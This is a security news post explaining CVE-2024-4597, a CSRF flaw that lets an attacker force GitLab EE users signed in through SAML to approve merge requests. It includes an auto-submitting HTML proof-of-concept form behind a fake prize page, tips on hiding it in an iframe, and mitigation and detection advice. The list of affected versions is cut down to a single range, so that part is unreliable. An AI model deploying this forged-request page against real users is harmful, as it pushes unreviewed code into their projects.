CVE CyberSecurity Database News

CVE-2024-4597 - Exploiting GitLab EE SAML CSRF to Force Merge Request Approval

Poster -

GitLab EE (Enterprise Edition) is well-known in the DevOps world, powering workflows and helping teams ship software faster. But with great popularity comes scrutiny—and sometimes, serious security bugs.

Recently, a high-impact issue has been discovered: CVE-2024-4597. This vulnerability allows attackers to exploit a Cross-Site Request Forgery (CSRF) condition, forcing a user that's already authenticated via SAML Single Sign-On (SSO) to approve a Merge Request (MR) without their actual consent.

This post breaks down how the bug works, shows proof-of-concept code, and helps you protect your GitLab instances.

What Is CVE-2024-4597?

CVE-2024-4597 affects GitLab EE deployments using SAML authentication. If a user is logged in with an active SAML session, an attacker can trick them (via CSRF) into approving a merge request.

16.11 before 16.11.2

If you’re running any version in those ranges, you’re at risk!

Official Advisory

- GitLab Security Advisory for CVE-2024-4597

Here’s how the bug unfolds, step by step

1. Victim is Logged In via SAML SSO: The target is a GitLab EE user authenticated through their organization's SAML provider.

Victim is Authorized to Approve MRs: The user has permission to approve merge requests.

3. Victim Visits a Malicious Website: The attacker sends a phishing email or link, leading the victim to a site they control.
4. CSRF Payload is Triggered: The malicious site sends a POST request in the background to GitLab EE, forging the "approve MR" action.
5. MR Gets Approved: The approval is processed as if the actual user had clicked 'Approve' themselves.

Because session cookies are sent automatically by the browser, the action succeeds. The vulnerability was possible due to an insufficient implementation of anti-CSRF protections in SAML flows.

Proof-of-Concept Exploit

Below is a simplified example of a possible CSRF attack targeting a user logged in to GitLab EE over SAML. Do not use this for malicious purposes—it’s for education and defense only!

Suppose the attacker knows the URL to trigger approval on a specific merge request, e.g.

https://gitlab.example.com/mygroup/myproject/merge_requests/42/approve

With a simple HTML page, the attacker can send a forged POST request

<!-- attack.html -->
<html>
  <body>
    <h1>Special Offer! Click somewhere to win a prize.</h1>
    <form id="csrf" action="https://gitlab.example.com/mygroup/myproject/merge_requests/42/approve" method="POST">
      <!-- Any required parameters would go here -->
    </form>
    <script>
      // Auto-submit the form; works if no X-CSRF-Token header/value needed
      document.getElementById('csrf').submit();
    </script>
  </body>
</html>

When the victim visits attack.html, the browser automatically includes their valid GitLab cookies.

- The form gets submitted, and if CSRF protections are missing or broken for the SAML-authenticated session, the MR #42 is instantly approved.

Enhancements: Attackers might hide the CSRF in an invisible iframe, auto-submit with JS, or use GET requests if allowed.

Why Did This Happen?

In secure web apps, every state-changing action (like approving MRs) should be protected by a random token (CSRF token) unique to the user's session. But, due to a flaw in GitLab EE’s handling of SAML sessions, CSRF checks could be bypassed or were not properly enforced for MR approvals.

How to Fix & Mitigate

Patch Immediately!

Restrict network access to GitLab EE (especially admin & MR approval features).

- Educate users: Remind them never to click suspicious links while logged in to sensitive services.
- Consider disabling SAML temporarily if you are not able to patch, or restrict it behind a trusted VPN.

Detection & Monitoring

- Review MR approval logs in GitLab EE for approvals at unusual times or from users who deny having acted.
- Set up alerts on rapid-fire MR approvals or approvals from new/unexpected IP addresses.

References

- GitLab Security Release: 16.11.2
- GitLab Issue Tracker & Release Notes *(if public)*
- OWASP CSRF Explanation

Summary

CVE-2024-4597 is a critical vulnerability for any GitLab EE installations using SAML. Attackers can trick legitimate users into approving malicious code merge requests, putting your source code and operations at risk. Patch now, audit your logs, and educate your users—don’t wait for attackers to act first!


Stay safe!
*Questions or feedback? Let me know in the comments below.*

Timeline

Published on: 05/14/2024 15:44:10 UTC
Last modified on: 05/14/2024 16:11:39 UTC